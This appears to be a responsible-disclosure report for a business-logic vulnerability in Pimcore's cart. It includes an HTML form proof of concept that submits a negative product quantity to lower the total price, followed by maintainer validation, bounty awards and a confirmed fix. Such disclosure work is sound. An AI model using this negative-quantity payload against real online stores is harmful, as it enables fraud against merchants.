Business Logic Errors in pimcore/pimcore

Valid

Reported on

Jul 24th 2021


✍️ Description

Pimcore is vulnerable to Business Logic error through negative products amount.

🕵️‍♂️ Proof of Concept

HTML content:

<form id="form" action="https://demo.pimcore.fun/en/cart" method="POST">
  <input name="items[12]" value="1">
  <input name="items[440]" value="-69">
  <input type="submit">
</form>
  1. Save the above content into an HTML file.
  2. Open the HTML file on the browser and click on Submit button.
  3. Check out the total price.

PoC video.

💥 Impact

It is possible to get all products for free or with a very low price.

Bernhard Rusch
4 months ago

@admin how can I signup as the maintainer of a project?

Ziding Zhang
4 months ago

Admin


Hey Bernhard, you should have access now. You will also automatically have access to all future pimcore disclosures. Do let me know if you encounter any further issues viewing the details of this report.

Bernhard Rusch
4 months ago

Yep, works fine now, thanks a lot! 👍

Bernhard Rusch validated this vulnerability 4 months ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on f51595 4 months ago
Bernhard Rusch has been awarded the fix bounty